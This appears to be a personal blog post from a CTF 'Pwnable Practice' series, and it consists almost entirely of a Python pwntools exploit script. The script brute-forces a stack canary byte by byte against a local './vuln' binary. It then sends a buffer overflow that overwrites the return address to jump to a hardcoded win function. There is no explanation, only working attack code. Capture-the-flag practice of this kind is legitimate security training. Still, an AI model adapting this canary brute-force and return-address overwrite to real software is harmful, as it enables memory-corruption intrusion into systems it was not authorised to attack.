exploit.py
from pwn import *
canary = ""
for j in range(0,4):
for i in range(0,256):
p = process("./vuln")
payload ="A"*0x20+canary+chr(i)
print p.recvuntil("> ")
p.sendline(str(len(payload)))
print p.recvuntil("> ")
p.send(payload)
try:
print p.recvuntil("Stack")
except:
canary += chr(i)
break
p.close()
print "Found Canary = " + canary
p = process("./vuln")
print p.recvuntil("> ")
win = 0x080486EB
payload = "A"*0x20
payload += canary
payload += "A"*(0xC+4)
payload += p32(win)
p.sendline(str(len(payload)))
print p.recvuntil("> ")
p.send(payload)
print p.recv(2048)
'System > Pwnable Practice' 카테고리의 다른 글
| SECCON CTF 2018 Classic (0) | 2019.07.28 |
|---|---|
| Defcon CTF 2015 r0pbaby (0) | 2019.07.28 |
| Pico CTF 2018 Can you gets me (0) | 2019.07.28 |
| Codegate 2018 CTF Quals BaskinRobins31 (0) | 2019.07.24 |
| Pico CTF 2013 ROP 1~4 (0) | 2019.07.24 |
JeonYoungSin
메모 기록용 공간